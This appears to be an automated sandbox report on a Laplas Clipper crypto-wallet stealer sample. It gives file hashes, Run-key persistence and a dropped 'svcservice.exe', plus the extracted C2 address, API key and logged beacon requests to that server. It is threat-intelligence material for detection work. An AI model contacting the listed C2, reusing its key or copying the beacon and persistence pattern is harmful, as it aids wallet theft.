Analysis

  • max time kernel
    147s
  • max time network
    102s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    11/03/2023, 08:30 UTC

General

  • Target

    747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe

  • Size

    269KB

  • MD5

    2ec6b6e536979c66b851f54e55d936cf

  • SHA1

    dc66788321acf7e368b40f07281d5f7ea77fbc13

  • SHA256

    747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00

  • SHA512

    fc299b1558a01dca518deeb0ab88d06b7d98d487699d3e47ee19b085a066fc28faa9febecf0162b46d9d0cb74c147ab672869e7bcf33482d63ddd785fa20b5da

  • SSDEEP

    6144:KFnpIOJ5avLVgQdUcwx/XDpXtLl9xejvE/5Jz9:EpIOOzVH/YDZb94jvE/V

Malware Config

Extracted

Family

laplas

C2

http://45.159.189.105

Attributes
  • api_key

    9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe
    "C:\Users\Admin\AppData\Local\Temp\747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1016
    • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
      "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1320

Network

  • Country: NL
    GET
    http://45.159.189.105/bot/regex
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:31:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • Country: NL
    GET
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172 HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:31:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • Country: NL
    GET
    http://45.159.189.105/bot/regex
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:32:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • Country: NL
    GET
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172 HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:32:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • Country: US
    DNS
    105.189.159.45.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.189.159.45.in-addr.arpa
    IN PTR
    Response
    105.189.159.45.in-addr.arpa
    IN PTR
  • Country: US
    DNS
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    IN PTR
    Response
  • 45.159.189.105:80
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    http
    svcservice.exe
    920 B
    2.2kB
    10
    6

    HTTP Request

    GET http://45.159.189.105/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

    HTTP Response

    200
  • 8.8.8.8:53
    105.189.159.45.in-addr.arpa
    dns
    73 B
    86 B
    1
    1

    DNS Request

    105.189.159.45.in-addr.arpa

  • 8.8.8.8:53
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    dns
    118 B
    182 B
    1
    1

    DNS Request

    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

    Filesize

    714.3MB

    MD5

    898e90b6dc90643bf08db60237258eef

    SHA1

    b868149a5f8c43345672685594ee25072fde5bf5

    SHA256

    9cf78bb50c9e904a44d6e1ff9ec0425060d4c6c3bee7be1826f883204174d2fb

    SHA512

    ae198d9caf6fb39cee2a906a078e5e0815cbfc64a56741e45105f82b11851364f0dbb8c0d8c2d1aa26c17dc05d0d981433fa1ef2078399c54e3f6828f3476796

  • memory/1016-122-0x00000000021F0000-0x000000000222E000-memory.dmp

    Filesize

    248KB

  • memory/1016-123-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

  • memory/1016-124-0x00000000021F0000-0x000000000222E000-memory.dmp

    Filesize

    248KB

  • memory/1016-127-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

  • memory/1016-131-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

  • memory/1320-133-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

  • memory/1320-136-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB
